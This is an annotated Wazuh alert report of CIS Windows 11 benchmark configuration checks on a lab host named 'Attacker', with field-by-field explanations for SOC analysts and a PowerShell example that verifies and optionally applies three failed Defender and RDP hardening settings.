data.sca.check.rationale:  When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn off real-time protection. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.9.2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on behavior monitoring' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on behavior monitoring' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.210+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.210+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on behavior monitoring' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  11
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.9.3']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.7']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2632663
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26326
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn on behavior monitoring' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to configure behavior monitoring for Microsoft Defender Antivirus. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn on behavior monitoring. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.9.3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on script scanning' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on script scanning' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.227+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.227+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Turn on script scanning' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19008
Numeric ID of the detection rule that fired.

rule.firedtimes:  12
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.9.4']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.7']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2635900
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26327
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Turn on script scanning' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows script scanning to be turned on/off. Script scanning intercepts scripts then scans them before they are executed on the system. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  When running an antivirus solution such as Microsoft Defender Antivirus, it is important to ensure that it is configured to heuristically monitor in real-time for suspicious and known malicious activity.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Real-Time Protection\Turn on script scanning. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 10 Release 21H2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.9.4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.compliance.cis_csc:  10.7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-TimeProtection']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.sca.check.result:  passed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Watson events' is set to 'Disabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Watson events' is set to 'Disabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.243+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.243+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Configure Watson events' is set to 'Disabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  31
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high-value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.5']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.3']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.11.1']
Maps to CIS benchmark controls – governance folks love this.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2639213
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26328
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Configure Watson events' is set to 'Disabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to configure whether or not Watson events are sent. The recommended state for this setting is: Disabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Watson events are the reports that get sent to Microsoft when a program or service crashes or fails, including the possibility of automatic submission. Preventing this information from being sent can help reduce privacy concerns.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Disabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Reporting\Configure Watson events. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.11.1
CIS benchmark recommendation number for this single check (same value as rule.cis above). Look it up in the benchmark document for the audit and remediation procedure.

data.sca.check.compliance.pci_dss:  2.2.5
PCI DSS requirement mapped to this single check. The per‑check compliance.* fields repeat the rule‑level mappings so one check can be filtered on its own.

data.sca.check.compliance.tsc:  CC6.3
SOC‑2 Trust Services Criteria mapped to this single check.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Reporting']
Registry key the SCA check reads to evaluate the policy. For this recommendation the CIS audit procedure expects the value DisableGenericRePorts set to 1 under this key; a missing key or value fails the check just like a wrong value.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Scan removable drives' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Scan removable drives' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.274+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.274+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Scan removable drives' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  32
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '2.2.3']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'CM.1']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC5.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.47.12.1']
Maps to CIS benchmark controls – governance folks love this.

rule.cis_csc:  ['10.4']
CIS Critical Security Controls mapping (the top‑level controls, distinct from the OS benchmark numbering in rule.cis).

rule.gpg_13:  ['4.3']
UK Good Practice Guide 13 (protective monitoring) control mapping.

rule.gdpr_IV:  ['35.7.d']
GDPR Chapter IV article reference; the same mapping as rule.gdpr above in a different field layout.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2642421
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26329
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Scan removable drives' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting allows you to manage whether or not to scan for malicious software and unwanted software in the contents of removable drives, such as USB flash drives, when running a full scan. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  It is important to ensure that any present removable drives are always included in any type of scan, as removable drives are more likely to contain malicious software brought in to the enterprise managed environment from an external, unmanaged computer.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Microsoft Defender Antivirus\Scan\Scan removable drives. Note: This Group Policy path may not exist by default. It is provided by the Group Policy template WindowsDefender.admx/adml that is included with the Microsoft Windows 8.1 & Server 2012 R2 Administrative Templates (or newer).
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.47.12.1
CIS benchmark recommendation number for this single check (same value as rule.cis above).

data.sca.check.compliance.cis_csc:  10.4
CIS Critical Security Control this check supports.

data.sca.check.compliance.pci_dss:  2.2.3
PCI DSS requirement mapped to this single check.

data.sca.check.compliance.nist_800_53:  CM.1
NIST 800‑53 control mapped to this single check.

data.sca.check.compliance.gpg_13:  4.3
UK Good Practice Guide 13 (protective monitoring) mapping.

data.sca.check.compliance.gdpr_IV:  35.7.d
GDPR Chapter IV article reference.

data.sca.check.compliance.hipaa:  164.312.b
HIPAA Security Rule citation for this single check.

data.sca.check.compliance.tsc:  CC5.2
SOC‑2 Trust Services Criteria mapped to this single check.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Scan']
Registry key the SCA check reads. The CIS audit procedure for this recommendation expects the value DisableRemovableDriveScanning to be 0 under this key (the policy is 'Enabled' when the Disable flag is 0); a missing key or value counts as a fail.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.

🧠 What happened? CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:10.431+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:10.431+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  7
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0: Ensure 'Do not allow drive redirection' is set to 'Enabled'.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  19007
Numeric ID of the detection rule that fired.

rule.firedtimes:  33
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sca']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.pci_dss:  ['2.2', '4.1']
PCI DSS mapping – card‑holder data rules.

rule.nist_800_53:  ['CM.1', 'SC.8']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC7.1', 'CC7.2', 'CC6.1', 'CC6.7', 'CC7.2']
SOC‑2 Trust Services Criteria tag.

rule.cis:  ['18.9.65.3.3.3']
Maps to CIS benchmark controls – governance folks love this.

rule.hipaa:  ['164.312.a.2.IV', '164.312.e.1', '164.312.e.2.I', '164.312.e.2.II']
HIPAA mapping – healthcare data exposure.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535010.2646145
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  sca
Name of the Wazuh decoder that parsed this raw log.

data.sca.type:  check
Scan engine type (script, registry, pkg). Good to know when writing fixes.

data.sca.scan_id:  1948494698
Session ID grouping all checks from the same run.

data.sca.policy:  CIS Microsoft Windows 11 Enterprise Benchmark v1.0.0
Name of the benchmark policy (e.g., CIS Ubuntu 20.04).

data.sca.check.id:  26340
Unique ID for this single check – copy to search historic runs.

data.sca.check.title:  Ensure 'Do not allow drive redirection' is set to 'Enabled'.
Headline of the secure‑config test (e.g., ‘Ensure password max‑age ≤ 365’).

data.sca.check.description:  This policy setting prevents users from sharing the local drives on their client computers to Remote Desktop Servers that they access. Mapped drives appear in the session folder tree in Windows Explorer in the following format: \\TSClient\$ If local drives are shared they are left vulnerable to intruders who want to exploit the data that is stored on them. The recommended state for this setting is: Enabled.
Detailed what/why of the check – great learning resource.

data.sca.check.rationale:  Data could be forwarded from the user's Remote Desktop Services session to the user's local computer without any direct user interaction. Malicious software already present on a compromised server would have direct and stealthy disk access to the user's local computer during the Remote Desktop session.
Why this matters (compliance / security impact).

data.sca.check.remediation:  To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Windows Components\Remote Desktop Services\Remote Desktop Session Host\Device and Resource Redirection\Do not allow drive redirection. Note: This Group Policy path is provided by the Group Policy template TerminalServer.admx/adml that is included with all versions of the Microsoft Windows Administrative Templates.
Vendor‑recommended fix text – copy‑paste for hardening tickets.

data.sca.check.compliance.cis:  18.9.65.3.3.3
CIS benchmark recommendation number for this single check (same value as rule.cis above).

data.sca.check.compliance.pci_dss:  4.1
PCI DSS requirement mapped to this single check.

data.sca.check.compliance.hipaa:  164.312.a.2.IV,164.312.e.1,164.312.e.2.I,164.312.e.2.II
HIPAA Security Rule citations for this single check.

data.sca.check.compliance.nist_800_53:  SC.8
NIST 800‑53 control mapped to this single check.

data.sca.check.compliance.tsc:  CC6.1,CC6.7,CC7.2
SOC‑2 Trust Services Criteria mapped to this single check.

data.sca.check.registry:  ['HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Terminal Services']
Registry key the SCA check reads. The CIS audit procedure expects the value fDisableCdm set to 1 under this key. This is a server‑side setting: it stops clients that RDP into this host from mapping their local drives into the session, which is the exposure the rationale above describes.

data.sca.check.result:  failed
PASS or FAIL. Red = needs fixing.

location:  sca
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions
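The three SCA checks above (18.9.47.11.1, 18.9.47.12.1 and 18.9.65.3.3.3) all failed on the same scan of host Attacker. The following PowerShell is an added example, not part of the SOCscribe report or of the CIS benchmark text: it re‑reads the three policy values directly on the endpoint so you can confirm the SCA result before raising a hardening ticket, and can optionally write the recommended values. The value names (DisableGenericRePorts, DisableRemovableDriveScanning, fDisableCdm) are the ones the CIS audit procedures use for these recommendations; the $ApplyFix variable and the function name are this example's own.

```powershell
# Added example: re-check the three failed CIS checks on the endpoint itself.
# Run in an elevated PowerShell on the host the alerts came from.
$ApplyFix = $false   # set to $true to write the recommended values (see note below)

$checks = @(
    [pscustomobject]@{
        Cis      = '18.9.47.11.1'
        Title    = 'Configure Watson events = Disabled'
        Key      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Reporting'
        Name     = 'DisableGenericRePorts'
        Expected = 1
    }
    [pscustomobject]@{
        Cis      = '18.9.47.12.1'
        Title    = 'Scan removable drives = Enabled'
        Key      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender\Scan'
        Name     = 'DisableRemovableDriveScanning'
        Expected = 0
    }
    [pscustomobject]@{
        Cis      = '18.9.65.3.3.3'
        Title    = 'Do not allow drive redirection = Enabled'
        Key      = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services'
        Name     = 'fDisableCdm'
        Expected = 1
    }
)

function Test-CisRegistryValue {
    param([Parameter(Mandatory)] $Check)

    # Get-ItemProperty throws when the key or the value is absent. An absent
    # policy value is exactly the 'failed' state SCA reported, so report it
    # as a fail rather than letting the script stop.
    $actual = $null
    try {
        $actual = (Get-ItemProperty -Path $Check.Key -Name $Check.Name -ErrorAction Stop).($Check.Name)
    } catch { }

    $display = if ($null -eq $actual) { '<not set>' } else { $actual }
    $result  = if ($actual -eq $Check.Expected) { 'pass' } else { 'FAIL' }

    [pscustomobject]@{
        CIS      = $Check.Cis
        Check    = $Check.Title
        Value    = $Check.Name
        Expected = $Check.Expected
        Actual   = $display
        Result   = $result
    }
}

$results = $checks | ForEach-Object { Test-CisRegistryValue -Check $_ }
$results | Format-Table -AutoSize

# Registry equivalent of the GP path quoted in each check's remediation text.
if ($ApplyFix) {
    foreach ($c in $checks) {
        if ((Test-CisRegistryValue -Check $c).Result -ne 'FAIL') { continue }
        if (-not (Test-Path $c.Key)) { New-Item -Path $c.Key -Force | Out-Null }
        New-ItemProperty -Path $c.Key -Name $c.Name -PropertyType DWord -Value $c.Expected -Force | Out-Null
        Write-Host "set $($c.Key)\$($c.Name) = $($c.Expected)"
    }
}
```

Values under HKLM\SOFTWARE\Policies are the registry image of Group Policy. On a domain‑joined host set them through the GPO path in each check's remediation text rather than with $ApplyFix, so the change survives policy refresh and shows up in gpresult; the direct write is for a standalone lab host like this one.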

Software protection service scheduled successfully.

🧠 What happened? Software protection service scheduled successfully.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:50:11.782+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:50:11.782+0000
When the Wazuh manager generated the alert, not when the endpoint wrote the event; for the endpoint‑side time use data.win.system.systemTime below. Keep the gap between the two in mind when correlating with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Software protection service scheduled successfully.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60642
Numeric ID of the detection rule that fired.

rule.firedtimes:  15
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_application']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535011.2650331
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-SPP
ETW provider that wrote the event. Security‑SPP is the Software Protection Platform (Windows licensing and activation), not a security product.

data.win.system.providerGuid:  {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}
GUID of that provider. Stable across hosts and builds, so it is the safest key for filters and correlation rules.

data.win.system.eventSourceName:  Software Protection Platform Service
Legacy event‑source name for the same provider; present only for events whose provider also keeps a classic event‑source registration.

data.win.system.eventID:  16384
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
Version of the event's definition (template). It changes when Microsoft adds fields to an event ID, so parsers should key on eventID plus version.

data.win.system.level:  4
Windows log level: 1 Critical, 2 Error, 3 Warning, 4 Information, 5 Verbose (0 = Log Always, used by audit events). 4 here means informational.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x80000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:50:00.8040331Z
